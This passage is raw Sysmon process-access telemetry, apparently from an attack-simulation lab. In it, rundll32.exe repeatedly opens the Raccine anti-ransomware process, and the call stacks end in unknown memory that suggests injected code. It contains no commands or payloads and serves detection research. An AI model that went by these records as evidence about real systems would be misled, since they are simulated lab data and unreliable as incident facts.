Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123060Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123059Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123058Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123057Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123056Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123055Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123054Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.419{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123053Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123052Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123051Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123050Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123049Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123048Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123047Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123046Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123045Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123044Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123043Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123042Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123041Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123040Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123039Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123038Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123037Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123036Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123035Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123034Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123033Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123032Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123031Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123030Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123029Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123028Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123027Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123026Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123025Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123024Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123023Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123022Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123021Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123020Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123019Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123018Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123017Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123016Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123015Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123014Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123013Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123012Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123011Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123010Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123009Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123008Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123007Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123006Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123005Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123004Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123003Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123002Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123001Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002123000Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.418{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002122999Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:15.417{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53A8C59) 10341000x80000000000000002088502Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:34:14.579{9DBE88B5-3005-61B2-BE03-010000000E02}76607312C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(000001BCD53B106C) 10341000x80000000000000002083071Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.626{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 